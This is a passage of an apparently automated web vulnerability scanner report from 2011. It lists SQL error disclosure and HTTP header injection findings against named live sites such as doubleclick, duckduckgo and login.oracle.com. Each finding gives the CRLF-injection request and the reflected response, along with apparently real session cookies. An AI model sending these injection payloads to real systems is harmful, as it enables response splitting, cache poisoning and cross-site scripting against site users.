Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298757236.2; __utmc=249072581; __utmb=249072581.1.10.1298757236;

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:19:03 GMT
Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 14497

...


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
<title>Trades and Exhibits :: STI - Creative Services</title>

<script type="text/javascript" language="javascript
...[SNIP]...
</b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b>
...[SNIP]...

1.32. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-7/page-1/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sti-cs.com
Path:   /Portfolio/Trades-and-Exhibits/id-7/page-1/

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /Portfolio/Trades-and-Exhibits/id-7'/page-1/ HTTP/1.1
Host: www.sti-cs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298757236.2; __utmc=249072581; __utmb=249072581.1.10.1298757236;

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:18:51 GMT
Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 14496

...


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
<title>Trades and Exhibits :: STI - Creative Services</title>

<script type="text/javascript" language="javascript
...[SNIP]...
</b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b>
...[SNIP]...

2. HTTP header injection
There are 11 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.



2.1. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Request

GET /38f9f%0d%0a80c0ca18afd/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BAl12x8lrTYPrB4m1sQe_0sHvCo2HpOsBhaKK8hLjqLazM_DLmgIQARgBIL7O5Q04AFDEwrTWBmDJhqOH1KOAEKABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAV9maWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9uZXRzcGFya2VyL2Jvb2xlYW4tc3FsLWluamVjdGlvbi1kYXRhYmFzZS11c2VyLWFkbWluLXhzcy1iaXpmaW5kLnVzLmh0bbgCGMACBcgC5e_FGKgDAdEDgo3m5suica71AwAAAMQ&num=1&sig=AGiWqtyRQEvi6hNd5BHN9N011_vfoVSX9g&client=ca-pub-4063878933780912&adurl=;ord=196821162? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1298931268&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fboolean-sql-injection-database-user-admin-xss-bizfind.us.htm&dt=1298909668737&shv=r20101117&jsv=r20110208&saldr=1&correlator=1298909668759&frm=0&adk=1607234649&ga_vid=1614914732.1298909669&ga_sid=1298909669&ga_hid=454076219&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1116&bih=939&fu=0&ifi=1&dtd=88&xpc=pfUEHUtOKO&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/38f9f
80c0ca18afd
/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http: //googleads.g.doubleclick.net/aclk
Date: Mon, 28 Feb 2011 16:16:15 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.2. http://ad.doubleclick.net/adj/N2998.159462.7724395940621/B4924654.4 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2998.159462.7724395940621/B4924654.4

Request

GET /2de58%0d%0a6d24920450/N2998.159462.7724395940621/B4924654.4;sz=728x90;pc=[TPAS_ID];click=http%3A//at.atwola.com/adlink%2F5113%2F679707%2F0%2F225%2FAdId%3D1200168%3BBnId%3D3%3Bitime%3D828708808%3Bkvpg%3Dwinamp%2Fskin%2Fslick-redux%2F222084%3Bkvugc%3D0%3Bkvui%3Df2ed797a429811e090debf3ab4450fde%3Bkvmn%3D93166279%3Bkvtid%3D16lsqii1n1a3cr%3Bkr2703%3D147217%3Bkvseg%3D99999%3A53575%3A53656%3A56768%3A56830%3A56835%3A60515%3A53615%3A52766%3A60130%3A50213%3A50239%3A60190%3A50215%3Bkp%3D86178%3Bnodecode%3Dyes%3Blink%3D;ord=828708808? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.winamp.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2de58
6d24920450
/N2998.159462.7724395940621/B4924654.4;sz=728x90;pc=[TPAS_ID];click=http: //at.atwola.com/adlink/5113/679707/0/225/AdId=1200168;BnId=3;itime=828708808;kvpg=winamp/skin/slick-redux/222084;kvugc=0;kvui=f2ed797a429811e090debf3ab4450fde;kvmn=93166279;kvtid=16lsqii1n1a3cr;kr2703=147217;k
Date: Sun, 27 Feb 2011 17:46:27 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.3. http://ad.doubleclick.net/adj/N2998.159462.7724395940621/B5077405.10 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2998.159462.7724395940621/B5077405.10

Request

GET /62182%0d%0a5ce3b6d291b/N2998.159462.7724395940621/B5077405.10;sz=728x90;pc=[TPAS_ID];click=http%3A//at.atwola.com/adlink%2F5113%2F851061%2F0%2F225%2FAdId%3D1312688%3BBnId%3D3%3Bitime%3D828694819%3Bkvpg%3Dwinamp%3Bkvugc%3D0%3Bkvui%3Df2ed797a429811e090debf3ab4450fde%3Bkvmn%3D93302596%3Bkvtid%3D16lsqii1n1a3cr%3Bkr2703%3D147217%3Bkvseg%3D99999%3A53575%3A53656%3A56768%3A56830%3A56835%3A60515%3A53615%3A52766%3A60130%3A50213%3A50239%3A60190%3A50215%3Bkp%3D86178%3Bnodecode%3Dyes%3Blink%3D;ord=828694819? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.winamp.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/62182
5ce3b6d291b
/N2998.159462.7724395940621/B5077405.10;sz=728x90;pc=[TPAS_ID];click=http: //at.atwola.com/adlink/5113/851061/0/225/AdId=1312688;BnId=3;itime=828694819;kvpg=winamp;kvugc=0;kvui=f2ed797a429811e090debf3ab4450fde;kvmn=93302596;kvtid=16lsqii1n1a3cr;kr2703=147217;kvseg=99999:53575:53656
Date: Sun, 27 Feb 2011 17:46:04 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2240932&PluID=0&w=125&h=125&ord=773834383&ucm=true&ncu=$$http://at.atwola.com/adlink/5113/1838222/0/6/AdId=1468660;BnId=1;itime=773834383;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311144;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; eyeblaster=BWVal=&BWDate=&debuglevel=51ad3%0d%0aeafac43fb55; A3=heSmakIJ0c9M00001hvPTaiJy0c6L00001gIlWai180aCf00001gnhgai180cbS00001; B3=8r8g0000000001tf7.Ws0000000001tf8z130000000001th8qaI0000000001tn; u2=3a6c8499-0c84-46b7-b54f-f22315d657803GI08g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=51ad3
eafac43fb55
; expires=Fri, 27-May-2011 21: 31:25 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=heSmakII0c9M00001hvPTaiJy0c6L00001gIlWai180aCf00001gnhgai180cbS00001hK5AalZb0bfZ00001; expires=Fri, 27-May-2011 21:31:25 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=8r8g0000000001tf7.Ws0000000001tf8z130000000001th8z6A0000000001tq8qaI0000000001tn; expires=Fri, 27-May-2011 21:31:25 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=3a6c8499-0c84-46b7-b54f-f22315d657803GI08g; expires=Fri, 27-May-2011 21:31:25 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 27 Feb 2011 02:31:24 GMT
Connection: close
Content-Length: 2193

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

2.5. https://duckduckgo.com/html/ [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /html/

Request

GET /html/?q=f0851%0d%0acb305ffa446 HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:56:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Q: f0851
cb305ffa446
Status: 200 OK
Expires: Tue, 01 Mar 2011 02:56:41 GMT
Cache-Control: max-age=1
Content-Length: 7794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- link href="http
...[SNIP]...

2.6. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login [Site2pstoreToken parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /pls/orasso/orasso.wwsso_app_admin.ls_login

Request

GET /pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~0C25F121~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d1d%0d%0adea71b54e71 HTTP/1.1
Host: login.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ORASSO_AUTH_HINT=v1.0~20110227072629; s_cc=true; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; BIGipServerloginadc_oracle_com_http=2030932621.25630.0000; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA; s_nr=1298762800321; gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 26 Feb 2011 23:29:47 GMT
Server: Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server
Content-Length: 4725
Set-Cookie: ORASSO_AUTH_HINT=v1.0~20110227072947; Domain=.oracle.com; Path=/
Cache-Control: private
Location: https://login.oracle.com/mysso/signon.jsp?site2pstoretoken=v1.2~0C25F121~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d1d
dea71b54e71
&p_error_code=&p_submit_url=https%3A%2F%2Flogin.oracle.com%2Fsso%2Fauth&p_cancel_url=https%3A%2F%2Flogin.oracle.com&ssousername=&subscribername=
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerloginadc_oracle_com_http=2030932621.25630.0000; expires=Sun, 27-Feb-2011 07:29:47 GMT; path=/

<HTML><HEAD><TITLE>Redirect to https://login.oracle.com/mysso/signon.jsp?site2pstoretoken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8
...[SNIP]...

2.7. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Request

GET /rtx/r.js?cmd=ADN&si=18288&pi=M&xs=3&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%253Fifu%253Dhttp%25253A//techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/%2526cmmiss%253D-1%2526cmkw%253D&r=&v=5.5&cb=60711 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; ANRTT=53615^1^1299284361|52766^1^1299284361|60130^1^1298898484|50213^1^1298930280|50239^1^1298930837; TData=99999|^|53575|53656|54063|56768|56830|56835|60506|60515|#|53615|52766|60130|50213|50239; N=2:2d4ec7443dfa469e64430537b01b46dc,ca3680f9be00bf67dd48c45e051ee302bf012%0d%0af7b9b665bf; ATTAC=a3ZzZWc9OTk5OTk6NTM1NzU6NTM2NTY6NTQwNjM6NTY3Njg6NTY4MzA6NTY4MzU6NjA1MDY6NjA1MTU6NTM2MTU6NTI3NjY6NjAxMzA6NTAyMTM6NTAyMzk=; eadx=1; CfP=1; JEB2=4D69B03E6E651A440C6EAF39F001EBEA

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 02:35:33 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sun, 27 Feb 2011 02:50:33 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; path=/; expires=Wed, 22-Feb-12 02:35:33 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=53615^1^1299284361|52766^1^1299284361|60130^1^1298898484|50213^1^1298930280|50239^1^1298930837|60190^1^1299378933; path=/; expires=Sun, 06-Mar-11 02:35:33 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1298774133^1298775933|18288^1298774133^1298775933; path=/; expires=Sun, 27-Feb-11 03:05:33 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|53575|53656|56768|56830|56835|60515|#|53615|52766|60130|50213|50239|60190; expires=Wed, 22-Feb-12 02:35:33 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Sun, 27-Feb-11 08:35:33 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:ca3680f9be00bf67dd48c45e051ee302bf012
f7b9b665bf
,c638727a4faa7467533adb5623113b72; expires=Wed, 22-Feb-12 02:35:33 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTM1NzU6NTM2NTY6NTY3Njg6NTY4MzA6NTY4MzU6NjA1MTU6NTM2MTU6NTI3NjY6NjAxMzA6NTAyMTM6NTAyMzk6NjAxOTA=; expires=Wed, 22-Feb-12 02:35:33 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 176
Content-Type: application/x-javascript
Content-Length: 176

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16lsqii1n1a3cr';
var ANSL='99999|^|53575|53656|56768|56830|56835|60515|#|53615|52766|60130|50213|50239|60190';
ANRTXR();


2.8. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Request

GET /rtx/r.js?cmd=ADN&si=8ecf0%0d%0a6420ebe94a&pi=M&xs=3&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%253Fifu%253Dhttp%25253A//techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/%2526cmmiss%253D-1%2526cmkw%253D&r=&v=5.5&cb=60711 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; ANRTT=53615^1^1299284361|52766^1^1299284361|60130^1^1298898484|50213^1^1298930280|50239^1^1298930837; TData=99999|^|53575|53656|54063|56768|56830|56835|60506|60515|#|53615|52766|60130|50213|50239; N=2:2d4ec7443dfa469e64430537b01b46dc,ca3680f9be00bf67dd48c45e051ee302; ATTAC=a3ZzZWc9OTk5OTk6NTM1NzU6NTM2NTY6NTQwNjM6NTY3Njg6NTY4MzA6NTY4MzU6NjA1MDY6NjA1MTU6NTM2MTU6NTI3NjY6NjAxMzA6NTAyMTM6NTAyMzk=; eadx=1; CfP=1; JEB2=4D69B03E6E651A440C6EAF39F001EBEA

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 02:33:28 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sun, 27 Feb 2011 02:48:28 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; path=/; expires=Wed, 22-Feb-12 02:33:28 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=53615^1^1299284361|52766^1^1299284361|60130^1^1298898484|50213^1^1298930280|50239^1^1298930837|60190^1^1299378808; path=/; expires=Sun, 06-Mar-11 02:33:28 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1298774008^1298775808|8ecf0
6420ebe94a
^1298774008^1298775808; path=/; expires=Sun, 27-Feb-11 03:03:28 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|53575|53656|56768|56830|56835|60515|#|53615|52766|60130|50213|50239|60190; expires=Wed, 22-Feb-12 02:33:28 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Sun, 27-Feb-11 08:33:28 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:ca3680f9be00bf67dd48c45e051ee302,c638727a4faa7467533adb5623113b72; expires=Wed, 22-Feb-12 02:33:28 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTM1NzU6NTM2NTY6NTY3Njg6NTY4MzA6NTY4MzU6NjA1MTU6NTM2MTU6NTI3NjY6NjAxMzA6NTAyMTM6NTAyMzk6NjAxOTA=; expires=Wed, 22-Feb-12 02:33:28 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 176
Content-Type: application/x-javascript
Content-Length: 176

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16lsqii1n1a3cr';
var ANSL='99999|^|53575|53656|56768|56830|56835|60515|#|53615|52766|60130|50213|50239|60190';
ANRTXR();


2.9. http://tags.crwdcntrl.net/5/c=25/b=1225394 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.crwdcntrl.net
Path:   /5/c=25/b=1225394

Request

GET /5/c=25/b=1225394?f335d%0d%0a6c92f1d82cf=1 HTTP/1.1
Host: tags.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/series_metacategory/1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwzdxymoGBUS%2FlldVZBlkGBgEl%2FV5OoHgvmOK5DKYEv4IpXmYwJdQGkbsJEZSG8PjAFNdjMMX%2FF0wJc4ApNl4wxWEEETRjAAE%2BUTBP4DhEsBosKPQMot0NYm0ExL5iCFUCseg9WKWwPpji%2FQdxhCnEMIgGLn8gBQDbtibF; cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmltP%2Fv2ydx8DAqJfyyuosSIyBzVlWiYmBQfJC8X9GBoYvDAxACshnbGDgUIp3gQsBGYxKSTOhfLA8s9BWS0aYThBfKd4LWZ5RaNMOsHweRJ6RgUOmTh3dLq7WSRhC9Q3oQpyPl6MLcSfswhTaiS7EV%2FEWXUjW7CK6EAAHWlQ7; OAID=6f898f9e37a5ffbfb8f8475e2a918987

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 27 Feb 2011 02:23:34 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwzdy6jIGBUS%2Fl7URjBlkGBgElBjDoBZM8l8GU4FcwxcsMpoTaIHI3IYLSEB4fmOJ6DKZEFcAU%2F18wJcwBpth4wRSHEZjiE4WoFAZTAschRj%2BD6HODWBsBESyGUCUQi943MDQArf0HMVofzBOIgAiaQhzhDyQArR4Vqg%3D%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:34 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2Fm1mX%2Fv2w5zMDAqJfydqIxSIyBzVlWiYmBQZKB4T8jA8OX%2F3%2BAFJARI7RpEyNMGMhQENq0A5lvo8z1F5nPpBTvgqyfUWirJUj%2B%2F18on4FDpk4d3SKu1kkYQvUN6ELcCbvQhTgfL8dUtRNdiK%2FiLbqQrNlFdCEAS1pZFg%3D%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:34 GMT; Path=/
Location: http://f335d
6c92f1d82cf
=1
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 0


2.10. http://tags.crwdcntrl.net/5/c=25/b=1225400 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.crwdcntrl.net
Path:   /5/c=25/b=1225400

Request

GET /5/c=25/b=1225400?2f2f5%0d%0a3a2cc9ab32b=1 HTTP/1.1
Host: tags.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/series_metacategory/1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
